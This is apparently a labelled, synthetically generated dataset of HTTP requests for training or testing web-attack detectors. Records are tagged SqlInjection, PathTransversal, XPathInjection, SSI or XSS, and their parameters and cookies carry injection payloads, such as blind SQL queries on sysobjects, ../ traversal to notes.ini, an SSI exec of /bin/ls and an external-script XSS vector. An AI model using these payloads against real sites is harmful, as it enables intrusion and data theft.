Accept: image/*
Accept-Charset: windows-1257;q=0.3, windows-1253;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 107.177.36.98
Cookie: cdsef=processing-instruction
Cookie2: $Version="10"
Date: Fri, 14 May 04 03:15:57 GMT
ETag: W/"u4HtIBSrU_SJ2Q3p6Q"
Expect: ajatsei7=hn7Hs
From: ghijiO@Fsrajafric.com
If-Modified-Since: Tue, 03 Jan 06 20:32:04 CET
If-Unmodified-Since: Sat, 28 May 05 14:28:11 CET
If-Match: "x3zDIVX.39-Dxmjoaf"
If-None-Match: "onQyMjUkTEk15zfeu"
If-Range: Sun, 15 Jan 06 14:30:56 CET
Max-Forwards: 4
MIME-Version: 0.7
Pragma: c2fqred=Ddnj
Authorization: esyEx nttyicer=syse
Range: 51-
Referer: http://igai.fr/oFmsheag/meeeyzi/ader/ltahegoa/qosh.nsf
TE: deflate,trailers,chunked;q=0.8
Trailer: Trailer
User-Agent: hhwrAy2Rtdj61efejp
UA-CPU: PowerPC
UA-Disp: 5073,578,16
UA-Color: color32
UA-Pixels: 006x6469
Via: ran/7.4 www.ml9ocat.jpeg, 7.0 www.ebswlm.jpeg
Transfer-Encoding: gzip
Warning: 176 3.53.123.242 "nltteLtvtattssrC" 
X-Forwarded-For: 113.116.65.59

null

End - Id: 36440
Start - Id: 42192
class: SqlInjection
GET /H.G/ZEu.between49m/eeoeliH0e/eioxmeeaemuie/s71/xom9uem/lAeSOWF2ikqJZ/0av@/eu8-SF7mfJZ@V-3.gif?hem6zetrfcmcDa=aaccess_logrupdate%7ETmqd&s88aihztanris=3275&st=%29k&sd=359lPu2bo1lr0nc&nmscetb=hyxddsjOTwzgru&blxr=Bic&a2ynd=ssosamahttpsEjb&C0a0ayG=ooanea&es2iuanlQnng=AND++++ascii%28lower%28substring%28%28SELECT+TOP+1+++++jCIlht+FROM+++sysobject++WHERE++++xtype+++%3D+++%27U%27%29%2C1%2C1%29%29%29++++%3E++++111 HTTP/1.1
Host: www.8du7c.biz
Connection: 4tOsa
Accept: */*
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: snoiTcuv-eeiib, cHnto-gBd, 0clt-ur0d;q=0.1
Cache-Control: no-store
Client-ip: 137.86.250.225
Cookie: phEehlerranoai=oEenkpdee;iteO=nhd3O;dtmeotl=inedCmfrnnhopenT;urD=498764
Cookie2: $Version="346"
Date: Sat, 16 Feb 08 09:59:35 GMT
ETag: W/"mDVvfRc_ydIMiZa"
Expect: irpp0=cI1o9hea;esvtet
From: bnR1@rhaYn.be
If-Modified-Since: Fri, 21 Oct 05 02:29:51 GMT
If-Unmodified-Since: Mon, 21 Jan 08 09:22:38 CET
If-Match: *
If-None-Match: "PIHkw8WjjlQkgHYIr.N"
If-Range: *
Max-Forwards: 7466
MIME-Version: 4.5
Pragma: e0='miaas'
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Digest nc=D9Efa2bf
Range: -3,97623-
Referer: http://www.aIca.cz/xohd.mdb
TE: chunked;q=0.2,chunked;q=0.2,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/5.9 (Machintosh; U; PPC 8.4; im-5e; rv:8.3.8) Gecko/15945973
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 124x5537
Via: FTP/9.6 91.64.8.25
Transfer-Encoding: ioCW
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 838 www.hoxvXtnu.htm "NewsildyiOe" 
X-Forwarded-For: 228.122.136.79
X-Serial-Number: 28598
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42192
Start - Id: 44698
class: PathTransversal
PUT /iEJFFi863@dA9UAz9.jpg? HTTP/1.1
Content-Length: 250
Content-Language: Aefa,iu,tala
Content-Encoding: gzip
Content-Location: http://www.argtnd.fr/dsbrod/ela6al/ruvlrrt/eip4tos/vTeitsre.jpg
Content-MD5: dGVlZ2F0aG5uMGN0c3JuRA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 28 Sep 06 06:10:41 UTC
Last-Modified: Sat, 15 Jan 05 18:45:07 CET
Host: www.redNtO.net
Connection: close
Accept: application/rtf, image/gif;q=0.8
Accept-Charset: windows-1250, euc-jp, shift_jis;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 159.172.8.1
Cookie: onytsai7iet=l;09ukQ4NV7s2=3465;inorFnh4=3;iw6amgoaEheytn=r9tecsaKsrlIzF
Cookie2: $Version="90"
Date: Fri, 17 Jun 05 17:36:25 UTC
ETag: W/"J8-xNtKg_EqXjlggwFK"
Expect: 100-continue
From: Eu9rraC@rmprTar.net
If-Modified-Since: Sat, 27 Feb 10 20:18:52 UTC
If-Unmodified-Since: Fri, 09 Jan 04 03:21:00 CET
If-Match: "dOy7aMFlaJjvlaXttA9"
If-None-Match: *
If-Range: Tue, 20 Jan 04 09:57:24 UTC
Max-Forwards: 5
Pragma: no-cache
Proxy-Authorization: Basic dzZubjptdHlo
Authorization: Digest qop=auth
Range: 2168-,8-1607,73-
Referer: http://www.siqna.cz/Igau/9cddcIb/dFJho0/depehgi/aon9id.nsf
TE: trailers,trailers,gzip
Trailer: If-Unmodified-Since
User-Agent: avtHt1 (uV0kiU-TR_; rugmQy; egk-QNjYI)
UA-CPU: StrongARM
UA-Disp: 7865,313,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 2309x0531
Via: 8.9 193.116.9.112
Transfer-Encoding: compress
Upgrade: ncsal/3.2, soi1/9.9, 2ilb/8.2
Warning: 857 185.30.26.113 "mesibeEtevaqn" "Sun, 20 Apr 08 19:11:08 GMT"
X-Forwarded-For: 121.97.240.234
X-Serial-Number: 175251
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~

GZXPpasswd=sceawaaduttrts2&ciGg3ro=e@-748UtOp&ipuaebpeXqt54=wrean&wneii=ondtfl&thR9y74yds=Re e&aItiano0nhye=eQ9&eoRby2tu=../../../usr/dsqqdsqsd.xml&oeimeMcaEsni=op&oi=YogeqDrsb07&cigkail6Eai3r=zPer5f&etw5ndtedikel=ol w&9senrtwtaaentlN=ouaeD

End - Id: 44698
Start - Id: 49756
class: XPathInjection
GET /ti4mTwre/y0QL6.s.uSJ.js?inow=ewasv%25uoe%3B&R-DoX@ULU=sy&dis=uoevriai&rhor=Nttir%3EnosTvyoxterm&W8ZPi=269522&nirpnstteta=46390&otitimgR=ewohtth&httpuYVFxB.Atrm6=Emnhit2h&optafris=4&ha6unxnpmt=ade&vXq_2aYRS=1821+or+++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or++0978%3D&Elettou=hYX&e4sot=353822&shXa3oiomttirn=iwindow.openfe%5Dsf+cw7E HTTP/1.0
Host: 242.155.14.223
Connection: close
Accept: video/mpeg;q=0.3, image/gif, audio/x-wav;q=0.1
Accept-Charset: iso-8859-8, iso-8859-5;q=0.5
Accept-Encoding: *
Accept-Language: ne-Yof;q=0.7
Cache-Control: no-store
Client-ip: 149.198.73.153
Cookie: m1Et3laoeds6=tt%imgpahftw;.rmDI=195107;seesc=~uspjo;8nlnlsencsio3e=l;Gh
Cookie2: $Version="46"
Date: Thu, 27 Nov 08 13:37:10 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: t8nua
From: 1ni9pe@Genwbli.net
If-Modified-Since: Wed, 09 Aug 06 21:32:23 GMT
If-Unmodified-Since: Fri, 03 Dec 04 15:36:52 UTC
If-Match: *
If-None-Match: "YPZXrM-LAwMFrNkV"
If-Range: Tue, 15 Apr 08 17:44:15 CET
Max-Forwards: 79
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c2dlZ2VvbG9pTmZla25DRmV0ZWVoMDBvZXRhbGFteER0Nzdud0U=
Range: 75-,6326-9694,9570-
Referer: /e6itx/etfid.cfm
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.8 (compatible; Konqueror/2.1; Linux i586; lueH; mrtyEamlt)
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3095x7377
Via: FTP/0.1 45.62.247.172
Transfer-Encoding: identity
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 925 www.tgat.css "onzuY" 
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49756
Start - Id: 45066
class: PathTransversal
GET /.nsf/../notes.ini? HTTP/1.1
Host: 60.54.80.150:80
Connection: keep-alive
Accept: image/gif, image/jpeg;q=0.2
Accept-Charset: big5;q=0.8, iso-8859-3;q=0.6, x-mac-japanese;q=0.5
Accept-Encoding: 
Accept-Language: saZt-n3e, oiuih3k-neagmltr;q=0.1, ansD1yT-as;q=0.3, 9TsiaAe-DhiU;q=0.0
Cache-Control: no-transform
Client-ip: 4.109.212.12
Cookie: irnh6Oeks=rnmXdh;YRq@=Gvart-H;traas=pjteoaeia;nTitiEmin=s3hvngbsprnwi;catfr=pal7hIfrJja;tggimgT2whereDhtpassS4U=rr
Cookie2: $Version="628"
Date: Thu, 13 Dec 07 05:54:49 UTC
ETag: W/"VI05iHgMeDWsSIG"
Expect: z4wo
From: a5eiztho@ausccrtksa.uk
If-Modified-Since: Mon, 26 Apr 10 01:37:54 UTC
If-Unmodified-Since: Fri, 30 Jan 04 16:37:50 CET
If-Match: *
If-None-Match: "g_CaWiatmA1dIm1t_i0M"
If-Range: *
Max-Forwards: 53
Pragma: no-cache
Proxy-Authorization: lerhb ixmcve=esfi
Authorization: wwm4 lhte=39nrsuh
Range: 373-850
Referer: http://itoigh.be/99Esr/lmfa3/ntnrl7/ncgl.wmn
TE: trailers
Trailer: Host
User-Agent: tTmtnefa/1.0
UA-CPU: Sparc
UA-Disp: 0628,6146,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 127x929
Via: FTP/3.0 www.es9o.html, 6.9 www.1fpntt.css, 3.8 82.93.61.138:2
Transfer-Encoding: gzip
Upgrade: sE8t/1.6, Nhe/7.5, xdp/3.6, iiAp/5.2, r0rr/5.2
Warning: 514 241.201.245.243 "Aasvtsf2rhfAiuhrred" 
X-Forwarded-For: 138.45.117.11
X-Serial-Number: 098890669103739278
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45066
Start - Id: 44754
class: PathTransversal
GET /agOO/TshwmtohA/dvPf0HIpY/gpt0CCzQ/r@hHW/3s0u_xyFMlXs/oCv/wRw0U64ROA9.E/JOhtpasst1FO/8KnetcatEM/nWgSv/sMjn-kk.htm?ilIaee9eaee=file%3A%2F%2F%2Fu%3A%2FttdrW%2Fscn%2F7ttjfy.xml&urtonr1=ieI8x8it+vso&slhuKus1r4jdik=tots&780=oslaedceezt HTTP/1.0
Host: 174.217.165.150
Connection: nen3et8w
Accept: audio/basic
Accept-Charset: iso-8859-7, x-mac-ce;q=0.5, koi8, windows-1252;q=0.8, iso-8859-6;q=0.7
Accept-Encoding: gzip;q=0.1, gzip;q=0.0, deflate, deflate;q=0.3, deflate;q=0.9
Accept-Language: *
Cache-Control: no-store
Client-ip: 245.254.197.131
Cookie: Ckboot.ininboot.iniA-2=tntREor7feqoafro;aajAeLvpNeLat=20777;mmnc=182067375;1dheeiSqO=rAp;ugnodiiStb=5 0dpsR9dqA5dtRoae;lXuprN9gb= hsaucansaicne
Cookie2: $Version="28"
Date: Sun, 25 Oct 09 19:14:25 CET
ETag: W/"xb-ZO.Nm0QQKMM6"
Expect: SIzOu3
From: 6R4thu@ercn3stwaa.biz
If-Modified-Since: Sun, 17 Jun 07 14:22:27 GMT
If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "Al_M2p86uSFudm_HScc-"
If-None-Match: "hWBAETg7jpDTDFR"
If-Range: *
Max-Forwards: 0162
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest qop=auth
Range: 484-6716,4-82,-34
Referer: /ee0Ir66c.sh
TE: chunked;q=0.4
Trailer: TE
User-Agent: eearaa6p
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 079 www.n1cn.tiff "meawmehgeEqekttk" "Tue, 06 Jul 04 17:24:32 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44754
Start - Id: 41644
class: SqlInjection
GET /w3.TDfoVby/7k53rnwyHDpu7kE8cvUB/ebn/OsouAyo8kRxerle/pE.zG0-ik/Sneie/twI3uWz9ncg/rQS/vh-ttuxwD/andHw5e@ovEXjWU.shtml?vace=%27+++%29+++UNION+++ALL+SELECT++atse6+++++FROM+dudtoaaa++++WHERE++%28+++%27%27+++%3D++++%27&Ogesig1ioEy0=01&arvFlvtbeeesRd=e+&3bt9tHyicpe=34698693&nvicua=ehWtmf&Icnt9Ofaklsr=gPQ6yM HTTP/1.0
Host: www.s6tli.gov
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: A-rsuij, tleaallI-dntnp;q=0.3, g9nht-nn, S6se-eesoaen, ticse-a;q=0.5
Cache-Control: no-cache
Client-ip: 254.173.30.240
Cookie: D488=90697375;1wu2=13
Cookie2: $Version="927"
Date: Sat, 02 Dec 06 17:43:34 UTC
ETag: W/"r_QJrhsuVl-TmF.YVYtB"
Expect: 100-continue
From: vlIol@haea.org
If-Modified-Since: Wed, 02 Nov 05 08:26:08 GMT
If-Unmodified-Since: Fri, 10 Nov 06 03:57:54 GMT
If-Match: "Vpnm6_tx@bTkEsTmda"
If-None-Match: *
If-Range: Fri, 27 May 05 11:30:42 GMT
Max-Forwards: 948
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM bG5sc2NhT05hdHJyZnVhRWljaWVub3B4eThwc2hUaWhocmgxb2FnYnRiMXo1dw==
Authorization: NTLM bmlkZHRkOXNoZGU3dGJ2c2RiZXJQOWEwZXRvbW9lZnNvUlBONQ==
Range: -11289
Referer: http://cusu1Oft.uk/i1hAftg.mdb
TE: chunked,trailers,trailers
Trailer: Accept
User-Agent: eexaObdjo (1KiGvJQzm; b@o6Jh; 6@RjxoEN; n8R2-sP)
UA-CPU: Sparc
UA-Disp: 041,9154,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 1153x567
Via: FTP/2.3 www.iUwad2.jpg, 2.7 234.0.224.228, ryrhn/9.3 www.yost.tiff
Transfer-Encoding: identity
Upgrade: liaory/2.2, awo4ag/4.5, oil/7.5, ctOl/2.3, see/4.6
Warning: 891 153.235.102.59 "cOto1fzuiSiEocefsa" 
X-Forwarded-For: 221.42.137.170
X-Serial-Number: 215683669428
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41644
Start - Id: 40095
class: SSI
GET /r51dlU/30rrNlqdqtiq/9Omadmin/htnne6h.html?xHesdianry=%3C%21--+++++%23exec++++cmd%3D%22%2Fbin%2Fls+++-l+++++%2Fhome%2Foivmee%2Fttodevn%22++--%3E&tnwMz=8&Enda=svJPb&3cn=e7keDIva&dv=iitsq5eirileeAmh&astonorer=n%40donPLS&um=qelthIsdbotridn5&stmnkttuhtatwi=isa%2Betl&axiincpHCidI=436&ertuin39jmiyt=ec&fybvy4=iPRdidlL HTTP/1.0
Host: 46.18.243.100
Connection: close
Accept: audio/x-wav;q=0.3
Accept-Charset: iso-8859-6;q=0.6, windows-1252, windows-1252;q=0.2
Accept-Encoding: compress;q=0.6, deflate, deflate;q=0.3, deflate;q=0.5
Accept-Language: *
Cache-Control: sr9Rhwo1=rl6zuU
Client-ip: 221.230.41.62
Cookie: iitohdixt=netcatphpjs sodt(rgiH?i;oeyetrlJmyog=rD;sEus4=rmd6uyneeeujo;tsadr=o6;jk4vjot0r=8
Cookie2: $Version="5"
Date: Sat, 14 Feb 04 14:14:32 CET
ETag: "SadNG8P.EPu@j4T"
Expect: 100-continue
From: eolu8j@aioa.fr
If-Modified-Since: Sun, 05 Jul 09 12:39:32 UTC
If-Unmodified-Since: Thu, 02 Apr 09 17:02:28 CET
If-Match: *
If-None-Match: "s.SJwnVzqO.HqKtTb"
If-Range: Mon, 02 May 05 07:33:03 CET
Max-Forwards: 8
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: http://eltDh9Oo.fr/oeteod/ssste.jpg
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Connection
User-Agent: Mozilla/9.4 (X11; U; Linux i586 4.0; qc-gd; rv:1.7.8) Gecko/16076678
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: gzip
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40095
Start - Id: 48065
class: XSS
GET /txNDYJIWXlZy1cK_AAq/ilp0dDIh-zzy1zw/4p1-lQn4VW7eqg8/c1ZXmjzBl3iDFo/sndt1auoet.mdb?.aOuCDYqJ=lsi&X5-2CGSAKGZ=4142543&nahPcEtenios4=%3Cdiv+++style++%3D%22+behaviour%3A++++url%28%5Bhttp%3A%2F%2Fwww.lilldela.com%2Fscript%2Fcrc8ieetio.mspx%5D%29%3B+++%22++%3E&ohdes=tF7vwdop_ HTTP/1.1
Host: 52.185.39.79:80
Connection: keep-alive
Accept: text/html;q=0.4, video/*, image/png
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: max-age=493
Client-ip: 43.162.196.251
Cookie: gt3iscccohs=81;s0a6fGMlF=nddHp;litod21eio9=heornonbhtr;weyloge3soSldab=fld;aioor=645929174;truoqnhliIipo=osai8z
Cookie2: $Version="9"
Date: Tue, 15 Sep 09 24:07:19 UTC
ETag: W/"@AY44BLRCYw-DcLtsp"
Expect: 100-continue
If-Modified-Since: Sat, 06 Jan 07 16:44:22 UTC
If-Unmodified-Since: Mon, 01 Nov 04 20:19:13 GMT
If-Match: "VYGRq2r4i2S0Y45u0pgG"
If-None-Match: "gqNLXdeo-YVHoePWr"
If-Range: Sat, 29 Apr 06 01:35:02 CET
Max-Forwards: 6
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: sedh aaieeArs=mnoE
Range: 576-842445,767371-238800,-653364
Referer: http://www.yryg1.biz/atsfuvC/iintBinn.tiff
Trailer: Warning
User-Agent: Mozilla/0.5 (X11; U; Linux i386 1.0; dr-lm; rv:1.8.8) Gecko/96376973
UA-CPU: PowerPC
UA-Disp: 722,7880,8
UA-Pixels: 2342x2073
Via: b6ian/2.9 22.49.125.72, 9.8 154.110.167.73
Transfer-Encoding: gzip
Upgrade: wAre6i/8.0, kmnmln/4.1, u2nAT/4.0
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 
X-Forwarded-For: 0.164.67.65

null

End - Id: 48065
Start - Id: 49582
class: XPathInjection
GET /adtokcmN/a_oo.@XGlBlrhCU1-/cWP.png?N0aWinputBpw=Ar%7CbthniStno+4doochildo%3D&iI1Cg0=jyIds2UX&serL5si=7986&locationPcopyS-YCaccept=m9%27+or+++++tsEo%2FiOieEn%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D6%5D+++or+++%27Z34pmz%27+++%3D+%27&lYeiraMEta=eqli4oaegltSia6e&soatuHam4woehg=e7TIW&aed=-9W%29whereyl%40%5C%27Lru-itn%3Dvn&lcitj5Emeesec1=lrvesn&emsdh=%3Bysdrafm HTTP/1.1
Host: 247.104.145.4
Connection: 8Cae
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, identity, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 231.234.74.67
Cookie: fRyDehk=8?
Cookie2: $Version="84"
Date: Sun, 16 May 04 07:16:12 GMT
ETag: ".TlCpyEuLRRD7Ffdh"
Expect: cadfTae=6qeeI
From: xAlQbr@oetAt.gov
If-Modified-Since: Mon, 15 Aug 05 22:19:12 UTC
If-Unmodified-Since: Wed, 21 Jul 04 22:38:14 CET
If-Match: "7EX_M0l7Gy5bsV4q8T"
If-None-Match: *
If-Range: Fri, 25 May 07 21:16:44 CET
Max-Forwards: 4
MIME-Version: 6.0
Pragma: ceyyuuo=ptesRrt
Proxy-Authorization: Digest nonce
Authorization: 0ejre partissh=brdssh
Range: -191,56-,-47911
Referer: /touatrf/0xcs2/tdnr4iRe/eirdm/ae5aoo.txt
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: egZUXN http://www.rAt0etd.net
UA-CPU: PowerPC
UA-Disp: 3990,9142,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2073x766
Via: 5.1 www.tum9k.htm
Transfer-Encoding: gzip
Upgrade: w3tun/4.7, nll2c/3.7, iotwG/2.5, ialro/2.8, zf5q/7.2
Warning: 497 53.69.32.200 "2sutvHa56sEcoGpl" "Mon, 17 Oct 05 23:56:09 GMT"
X-Forwarded-For: 192.195.46.225
X-Serial-Number: 9696710
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49582
Start - Id: 42093
class: SqlInjection
GET /ikJW/eL2GBXw/r5M1z4ftOw6P5Tixqsn/ojSOf7YwiMTS/ieltm0aoktcts/9urgif/ot3iovltIrts/fr0mftwa.gif?KidcaNh=ns7nruenar&Mu@ik=%27++OR+++%27gseeTaon7qt%27%3D%27&DRiqsCle=oNmnF&taoueeuraca=nw&yAa=5gnsryaelyhhsaDn5o HTTP/1.1
Host: 98.234.199.36
Connection: close
Accept: */*;q=0.4
Accept-Charset: windows-1257, x-mac-japanese, windows-874;q=0.7, iso-8859-8, utf-8;q=0.0
Accept-Encoding: deflate;q=0.8, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 50.155.156.250
Cookie: GNZYv=niijtxhhttpieo2lruds8u;lgYxFGnph-DyIbM=aCcaCLWSw;srjO=965260
Cookie2: $Version="6"
Date: Sat, 19 May 07 19:19:46 UTC
ETag: "p2DgA9LRc_haRnet.oc"
Expect: bu7dtjr
From: LzmxnseS@evezd.fr
If-Modified-Since: Sun, 06 Mar 05 09:09:26 UTC
If-Unmodified-Since: Sun, 03 May 09 06:58:00 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 25 Oct 09 10:38:31 UTC
Max-Forwards: 006
MIME-Version: 0.9
Pragma: c6umIee='tccpa'
Proxy-Authorization: NTLM VGFlZHBlN3lzdDM4RWV0aWJsaGlhYWJoc2ZvdFd1aWVTZWxi
Authorization: Digest algorithm=roOs
Range: 106-1944,67279-,2-
Referer: http://sis4Dl.org/iteEdrai/teiA4Ci/tnhrhpA/e5euoit.tiff
TE: chunked
Trailer: Accept-Language
User-Agent: daeo9Meit
UA-CPU: Sparc
UA-Disp: 7402,9004,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4728x9077
Via: 9.6 www.zn9s.gif:7362
Transfer-Encoding: compress
Upgrade: z6NS/9.8, Brl/1.0, ets/2.0
Warning: 145 www.cr5ce.html "1asaNdgii" "Tue, 19 Jan 10 12:01:34 CET"
X-Forwarded-For: 39.4.112.68
X-Serial-Number: 912151407
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42093
Start - Id: 39297
class: SSI
GET /FsUsouK/e5d.A.92j0/dGSJe/lmWrz3OtG7Sfz4./qao9eOw/jNQxWCa66x/irdiet3eSi0l2/7upHXOBp3.zawu/pto/staeerUnewrwat7.tiff?vrdateor=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&qmhuenzfkiuctaw=wm HTTP/1.1
Host: www.aw5epswtdl.be
Connection: close
Accept: application/x-tar;q=0.2, application/x-tar;q=0.5, audio/x-wav
Accept-Charset: windows-1258;q=0.5
Accept-Encoding: compress
Accept-Language: oEsxdi-p;q=0.5, s-ueje, mssnit-c
Cache-Control: only-if-cached
Client-ip: 178.60.27.113
Cookie: tm=e4eim
Cookie2: $Version="390"
Date: Fri, 11 Mar 05 22:39:47 CET
ETag: W/"jsr.W0L@rVg50t8d"
Expect: iGetlsru
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Sun, 29 Mar 09 17:57:44 GMT
If-Match: *
If-None-Match: "Ohb_@MSYNk.0vicdi"
If-Range: Thu, 16 Dec 04 20:00:28 CET
Max-Forwards: 6
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: NTLM NWN0R2Qwb3RyaGZ3ZGVvVGNkZmpucXlhaXRhQU1uZWZs
Range: -9614
Referer: /fdiat/ieQnrddm/nrrfl.txt
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: 6ahaoh (nE0RgR-.a; adatOPpmR)
UA-CPU: Sparc
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 573x190
Via: 6.1 209.225.112.43, 6.8 www.ytmo.tiff
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: m0oet/4.8
Warning: 156 www.oflmf0.htm "ohhwOseoMrpccZBlSp" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39297
Start - Id: 35464
class: SqlInjection
PUT /siolhiHnvltmrtdeoarO/ec.jpeg? HTTP/1.1
Content-Length: 192
Content-Language: E
Content-Encoding: compress
Content-Location: /tiwd0ltn/ietheCe/n3Vhodsw/retgeRFe.gif
Content-MD5: bTN3MWlybGFzaTB0cnIyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 26 Apr 09 02:40:45 UTC
Last-Modified: Sun, 30 Sep 07 10:05:13 UTC
Host: www.soiriaeiei.it:0
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 187.225.34.2
Cookie: 2nxxbuegnuu=0hocy.TtLif;jdR0-7V='  OR    'eeSar7wvwiO'= ' 
Date: Wed, 28 Mar 07 04:04:47 CET
ETag: "BgJ2GgKHomhWKTY"
From: goeb@mtordg4nye.gov
If-Modified-Since: Tue, 19 Feb 08 18:42:22 UTC
If-Match: *
If-None-Match: "yCawLj7G2_Zy.c72A"
If-Range: "76QabOeqOA-IfQt1"
Max-Forwards: 53
MIME-Version: 6.1
Pragma: ohiw='tsi'
Authorization: tttn 9ycd=o7s9m
Referer: http://4eoiiao.cz/iNrks/ponewh04/ndma7Gce/oeyotte.cgi
TE: trailers,deflate;q=0.4,deflate
User-Agent: Mozilla/2.1 (Windows; U; Windows NT 3.4; rr-br; rv:6.9.9) Gecko/79688819
UA-Color: color16
Transfer-Encoding: compress

m8ceih=xme iwnnEhea&58heHdx6d=47708798&sbe=div~uorO&etxft=5&aE5.lT-@xbEs=390782&oouttNEnOlmnet=4ms&uUcwesr=ato&Pt6rS8r=epassthruCdi&or=u'bhomelTo&nph-LXAhftp@FftpPc=036463&apiysgTht=049674

End - Id: 35464
Start - Id: 40720
class: SSI
POST /MTOuu2Ss46O.cA/hRkvio.Ekgo.9/RY4npOVrnernbriet/scad/amqtlcaertuhesfnots/tGymaWeADpO-ajW7/1dPfqVh1RMoRW9/ozncMxFedTJ6/ehi/siyon/auNpeit/eyoiamAosHbgsTnefe.bin? HTTP/1.0
Content-Length: 210
Content-Language: toou
Content-Encoding: identity
Content-Location: /nuaGsd/sncgptt/mrwtnsia/nITheef/mgfeb1.swf
Content-MD5: ZUV2c2k5MWh0ZWJvQWx0aA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 04 Apr 08 07:09:00 UTC
Host: www.l1eiut.com:80
Connection: nsaan1nS
Accept: video/*;q=0.2, image/*
Accept-Charset: x-mac-icelandic, cp-932;q=0.3, shift_jis, x-mac-turkish
Accept-Encoding: compress
Accept-Language: *
Cache-Control: no-transform
Cookie: TO-cZ4-_m=<!--#include     virtual="d:\windows\autoexec.bat"  -->;lE4=iimmis
Cookie2: $Version="408"
Date: Fri, 09 May 08 24:37:09 CET
ETag: W/"Yc3MpH-OI6sidSG3"
Expect: eesnja
If-Modified-Since: Fri, 10 Dec 04 20:47:17 UTC
